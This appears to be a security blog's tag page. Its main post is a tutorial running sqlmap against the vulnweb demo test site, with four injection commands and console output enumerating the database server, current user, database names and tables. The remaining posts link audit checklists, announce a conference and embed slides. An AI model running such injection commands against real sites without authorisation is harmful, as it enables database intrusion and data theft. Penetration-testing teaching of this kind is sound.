Posts tagged Security

Using SQLMap for sql Injection

0

We have been using lot of tools for sqlinjection while Pentesting today we will see how to use SQLMap a Open source Database Fingerprinting tool which works without much of the false positives,we will test this tool on http://testphp.vulnweb.com demo site.

  1. Database Fingerprinting

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1

sqlmap/0.9-dev – automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net[*] starting at: 11:52:47

[11:52:47] [INFO] using ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session’ as session file
[11:52:47] [INFO] resuming injection point ‘GET’ from session file
[11:52:47] [INFO] resuming injection parameter ‘cat’ from session file
[11:52:47] [INFO] resuming injection type ‘numeric’ from session file
[11:52:47] [INFO] resuming match ratio ‘0.701’ from session file
[11:52:47] [INFO] resuming 0 number of parenthesis from session file
[11:52:47] [INFO] resuming back-end DBMS ‘mysql 5′ from session file
[11:52:47] [INFO] testing connection to the target url
[11:52:48] [INFO] testing for parenthesis on injectable parameter
[11:52:48] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5[*] shutting down at: 11:52:48

2)Finding the Database name and current user.


./sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 –current-db –current-user

sqlmap/0.9-dev – automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net[*] starting at: 11:57:13

[11:57:13] [INFO] using ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session’ as session file
[11:57:13] [INFO] resuming injection point ‘GET’ from session file
[11:57:13] [INFO] resuming injection parameter ‘cat’ from session file
[11:57:13] [INFO] resuming injection type ‘numeric’ from session file
[11:57:13] [INFO] resuming match ratio ‘0.701’ from session file
[11:57:13] [INFO] resuming 0 number of parenthesis from session file
[11:57:13] [INFO] resuming back-end DBMS ‘mysql 5′ from session file
[11:57:13] [INFO] testing connection to the target url
[11:57:17] [INFO] testing for parenthesis on injectable parameter
[11:57:17] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5
[11:57:17] [INFO] fetching current user
[11:57:17] [INFO] retrieved: acuart@localhost
current user:    ‘acuart@localhost’

[11:58:45] [INFO] fetching current database
[11:58:45] [INFO] read from file ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session': acuart
current database:    ‘acuart’

[11:58:45] [INFO] Fetched data logged to text files under ‘/pentest/database/sqlmap/output/testphp.vulnweb.com'[*] shutting down at: 11:58:45

3) Enumerate Databases

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 –dbs

sqlmap/0.9-dev – automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net[*] starting at: 12:00:57

[12:00:58] [INFO] using ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session’ as session file
[12:00:58] [INFO] resuming injection point ‘GET’ from session file
[12:00:58] [INFO] resuming injection parameter ‘cat’ from session file
[12:00:58] [INFO] resuming injection type ‘numeric’ from session file
[12:00:58] [INFO] resuming match ratio ‘0.701’ from session file
[12:00:58] [INFO] resuming 0 number of parenthesis from session file
[12:00:58] [INFO] resuming back-end DBMS ‘mysql 5′ from session file
[12:00:58] [INFO] testing connection to the target url
[12:00:58] [INFO] testing for parenthesis on injectable parameter
[12:00:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5
[12:00:58] [INFO] fetching database names
[12:00:58] [INFO] fetching number of databases
[12:00:58] [INFO] read from file ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session': 3
[12:00:58] [INFO] read from file ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session': information_schema
[12:00:58] [INFO] read from file ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session': acuart
[12:00:58] [INFO] read from file ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session': modrewriteShop
available databases [3]:[*] acuart[*] information_schema[*] modrewriteShop

[12:00:58] [INFO] Fetched data logged to text files under ‘/pentest/database/sqlmap/output/testphp.vulnweb.com'[*] shutting down at: 12:00:58
4) Enumerate Database tables and Columns

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 –tables –columns

sqlmap/0.9-dev – automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[*] starting at: 12:03:27

[12:03:27] [INFO] using ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session’ as session file
[12:03:27] [INFO] resuming injection point ‘GET’ from session file
[12:03:27] [INFO] resuming injection parameter ‘cat’ from session file
[12:03:27] [INFO] resuming injection type ‘numeric’ from session file
[12:03:27] [INFO] resuming match ratio ‘0.701’ from session file
[12:03:27] [INFO] resuming 0 number of parenthesis from session file
[12:03:27] [INFO] resuming back-end DBMS ‘mysql 5′ from session file
[12:03:27] [INFO] testing connection to the target url
[12:03:28] [INFO] testing for parenthesis on injectable parameter
[12:03:28] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5
[12:03:28] [INFO] fetching tables
[12:03:28] [INFO] fetching database names
[12:03:28] [INFO] fetching number of databases
[12:03:28] [INFO] read from file ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session': 3
[12:03:28] [INFO] read from file ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session': information_schema
[12:03:28] [INFO] read from file ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session': acuart
[12:03:28] [INFO] read from file ‘/pentest/database/sqlmap/output/testphp.vulnweb.com/session': modrewriteShop
[12:03:28] [INFO] fetching number of tables for database ‘information_schema’
[12:03:28] [INFO] retrieved: 16
[12:03:37] [INFO] retrieved: CHARACTER_SETS
[12:04:52] [INFO] retrieved: COLLATI

It was So easy from this tool to enumerate the details next i will be telling on using sqlmap for Advanced techniques

Web Application Security Audit checklists

0

Below are the few Audit checklists which helps in Securing the WebApplication.

http://msdn.microsoft.com/en-us/library/aa302332.aspx
https://blogs.sans.org/it-audit/checklists/web-application-audit-checklist/
http://www.owasp.org/index.php/Category:OWASP_Testing_Project
https://www.watsonhall.com/methodology/checklists.pl
http://www.bestsecuritytips.com/xfsection+article.articleid+169.htm
http://www.certifiedsecure.eu/checklists/cs-basic-web-application-audit.pdf

Ekoparty Security Conference September 16-17

0

The ekoparty held annually in the Autonomous City of Buenos Aires where attendees, guests, and related specialists from around the world have the opportunity to engage with technological innovation, vulnerabilities and tools in a relaxed atmosphere and knowledge sharing.

Presentations on Web Application Threats and Security

0

All the past and updated Presentations from Jeremiah Grossman.

[slideshare id=4768754&doc=web-app-security-2-100715231657-phpapp02]

[slideshare id=4764407&doc=whitehatbhpreso08032006-100715140133-phpapp02]

[slideshare id=4764390&doc=blackhat2002-singapore-100715180937-phpapp02]

[slideshare id=4764365&doc=blackhatneworleans2002-100715180550-phpapp01]

Rest of the Presentations,Documents and Videos can be found here

http://www.slideshare.net/jeremiahgrossman

r

Go to Top